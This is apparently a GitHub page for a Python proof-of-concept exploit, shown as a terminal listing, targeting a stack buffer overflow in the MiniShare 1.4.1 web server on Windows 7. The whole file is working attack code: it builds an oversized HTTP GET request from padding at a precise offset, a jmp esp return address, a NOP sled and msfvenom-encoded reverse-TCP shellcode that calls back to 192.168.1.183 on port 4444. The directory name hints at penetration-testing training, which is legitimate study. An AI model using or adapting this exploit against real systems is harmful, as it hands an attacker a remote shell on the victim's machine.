-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathmini-poc.py
57 lines (47 loc) · 2.62 KB
/
mini-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
c@kali:~/src/$ cat minishare141-win7ultip0c-2.py
#!/usr/bin/env python
import sys, socket
target = sys.argv[1]
port = 80
print '[+] checking:', target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
#shellcode = ""
buffer = "GET "
padding = "A" * 1787 # [*] Exact match at offset 1787
ret_addr = "\x71\xe8\x58\x77" # search for jmpesp in modules
nopsss = "\x90" * 26
# c@kali:~/src/oscp$ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.183
# LPORT=4444 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
# x86/shikata_ga_nai chosen with final size 360
# Payload size: 360 bytes
shellcode = ""
shellcode += "\xd9\xc5\xbd\x4d\x99\xdc\x16\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
shellcode += "\x54\x83\xea\xfc\x31\x6a\x14\x03\x6a\x59\x7b\x29\xea\x89\xf9"
shellcode += "\xd2\x13\x49\x9e\x5b\xf6\x78\x9e\x38\x72\x2a\x2e\x4a\xd6\xc6"
shellcode += "\xc5\x1e\xc3\x5d\xab\xb6\xe4\xd6\x06\xe1\xcb\xe7\x3b\xd1\x4a"
shellcode += "\x6b\x46\x06\xad\x52\x89\x5b\xac\x93\xf4\x96\xfc\x4c\x72\x04"
shellcode += "\x11\xf9\xce\x95\x9a\xb1\xdf\x9d\x7f\x01\xe1\x8c\xd1\x1a\xb8"
shellcode += "\x0e\xd3\xcf\xb0\x06\xcb\x0c\xfc\xd1\x60\xe6\x8a\xe3\xa0\x37"
shellcode += "\x72\x4f\x8d\xf8\x81\x91\xc9\x3e\x7a\xe4\x23\x3d\x07\xff\xf7"
shellcode += "\x3c\xd3\x8a\xe3\xe6\x90\x2d\xc8\x17\x74\xab\x9b\x1b\x31\xbf"
shellcode += "\xc4\x3f\xc4\x6c\x7f\x3b\x4d\x93\x50\xca\x15\xb0\x74\x97\xce"
shellcode += "\xd9\x2d\x7d\xa0\xe6\x2e\xde\x1d\x43\x24\xf2\x4a\xfe\x67\x9a"
shellcode += "\xbf\x33\x98\x5a\xa8\x44\xeb\x68\x77\xff\x63\xc0\xf0\xd9\x74"
shellcode += "\x27\x2b\x9d\xeb\xd6\xd4\xde\x22\x1c\x80\x8e\x5c\xb5\xa9\x44"
shellcode += "\x9d\x3a\x7c\xf0\x97\xac\xbf\xad\xa9\x9b\x28\xac\xa9\xf2\xf4"
shellcode += "\x39\x4f\xa4\x54\x6a\xc0\x04\x05\xca\xb0\xec\x4f\xc5\xef\x0c"
shellcode += "\x70\x0f\x98\xa6\x9f\xe6\xf0\x5e\x39\xa3\x8b\xff\xc6\x79\xf6"
shellcode += "\x3f\x4c\x88\x06\xf1\xa5\xf9\x14\xe5\xd7\x01\xe5\xf5\x7d\x02"
shellcode += "\x8f\xf1\xd7\x55\x27\xfb\x0e\x91\xe8\x04\x65\xa1\xef\xfa\xf8"
shellcode += "\x90\x84\xcc\x6e\x9d\xf2\x30\x7f\x1d\x03\x66\x15\x1d\x6b\xde"
shellcode += "\x4d\x4e\x8e\x21\x58\xe2\x03\xb7\x63\x53\xf7\x10\x0c\x59\x2e"
shellcode += "\x56\x93\xa2\x05\xe5\xd4\x5d\xdb\xcb\x7c\x36\x23\x4b\x7d\xc6"
shellcode += "\x49\x4b\x2d\xae\x86\x64\xc2\x1e\x66\xaf\x8b\x36\xed\x21\x79"
shellcode += "\xa6\xf2\x68\xdf\x76\xf2\x9e\xc4\x6f\x7d\x61\xfb\x8f\x7f\x5e"
shellcode += "\x2d\xb6\xf5\xa7\xed\x8d\x06\x92\x50\xa7\x8c\xdc\xc7\xb7\x84";
endreq = " HTTP/1.1\r\n\r\n"
payload = buffer + padding + ret_addr + nopsss + shellcode + endreq
s.send(payload)
s.close()
c@kali:~/src/$